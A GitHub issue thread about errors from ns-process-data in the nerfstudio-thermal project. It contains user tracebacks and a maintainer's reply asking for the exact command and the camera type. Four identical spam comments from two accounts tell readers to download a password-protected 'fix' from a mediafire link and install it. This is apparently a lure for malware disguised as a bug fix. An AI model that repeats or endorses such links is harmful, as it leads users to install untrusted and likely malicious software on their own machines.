### ISSUE TITLE
Errors when running ns-process-data

### ISSUE THREAD

**Issue by Neal2020GitHub** [yvette256/nerfstudio-thermal#6]
Hi authors! 

It seems that when running `ns-process-data` for some scenes, such as charger and trace, it will raise the following errors. 

Any idea how to solve it? Thank you!

```
Traceback (most recent call last):
  File "/home/neal/miniconda3/envs/thermalnerf/bin/ns-process-data", line 8, in <module>
    sys.exit(entrypoint())
  File "/home/neal/codes/nerfstudio-thermal/nerfstudio/scripts/process_data.py", line 533, in entrypoint
    tyro.cli(Commands).main()
  File "/home/neal/codes/nerfstudio-thermal/nerfstudio/process_data/rgbt_to_nerfstudio_dataset.py", line 226, in main
    M1 = np.array(frame1["transform_matrix"])
TypeError: 'NoneType' object is not subscriptable
```

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by FoioMikael** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by FoioMikael** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Ehs9449** [comment]
Actually, I face the same kind of error for new thermal images that I took, and they can't be processed. Do you have any ideas to solve?

```
Traceback (most recent call last):
  File "C:\Users\eaghae1\AppData\Local\miniconda3\envs\thermalnerf\lib\runpy.py", line 196, in _run_module_as_main
    return _run_code(code, main_globals, None,
  File "C:\Users\eaghae1\AppData\Local\miniconda3\envs\thermalnerf\lib\runpy.py", line 86, in _run_code
    exec(code, run_globals)
  File "C:\Users\eaghae1\AppData\Local\miniconda3\envs\thermalnerf\Scripts\ns-process-data.exe\__main__.py", line 7, in <module>
  File "C:\Users\eaghae1\nerfstudio-thermal\nerfstudio\scripts\process_data.py", line 533, in entrypoint
    tyro.cli(Commands).main()
  File "C:\Users\eaghae1\AppData\Local\miniconda3\envs\thermalnerf\lib\site-packages\tyro\_cli.py", line 207, in cli
    output = _cli_impl(
  File "C:\Users\eaghae1\AppData\Local\miniconda3\envs\thermalnerf\lib\site-packages\tyro\_cli.py", line 479, in _cli_impl
    get_out, consumed_keywords = _calling.callable_with_args(
  File "C:\Users\eaghae1\AppData\Local\miniconda3\envs\thermalnerf\lib\site-packages\tyro\_calling.py", line 175, in callable_with_args
    value = get_value()
  File "<string>", line 32, in __init__
  File "C:\Users\eaghae1\nerfstudio-thermal\nerfstudio\process_data\rgbt_to_nerfstudio_dataset.py", line 34, in __post_init__
    flir_utils.extract_raws_from_dir(self.data, upsample_thermal=self.upsample_thermal)
  File "C:\Users\eaghae1\nerfstudio-thermal\nerfstudio\process_data\flir_utils.py", line 300, in extract_raws_from_dir
    rgb_np, thermal_np = raw_nps_from_flir(path, verbose=False)
  File "C:\Users\eaghae1\nerfstudio-thermal\nerfstudio\process_data\flir_utils.py", line 272, in raw_nps_from_flir
    fie.process_image(img_path)
  File "C:\Users\eaghae1\nerfstudio-thermal\nerfstudio\process_data\flir_utils.py", line 63, in process_image
    if self.get_image_type().upper().strip() == "TIFF":
  File "C:\Users\eaghae1\nerfstudio-thermal\nerfstudio\process_data\flir_utils.py", line 80, in get_image_type
    return meta['RawThermalImageType']
KeyError: 'RawThermalImageType'
```

**Comment by yvette256** [comment]
Hi, apologies for the super late reply, but might as well ask if either of you are still stuck on this:
@Neal2020GitHub : What is the exact command that you used?
@Ehs9449 : What is the type of camera that you used to take the pictures? The code for processing thermal images might not work if it's not a FLIR ONE camera, since it relies on the images being in the specific file format that FLIR ONE uses.
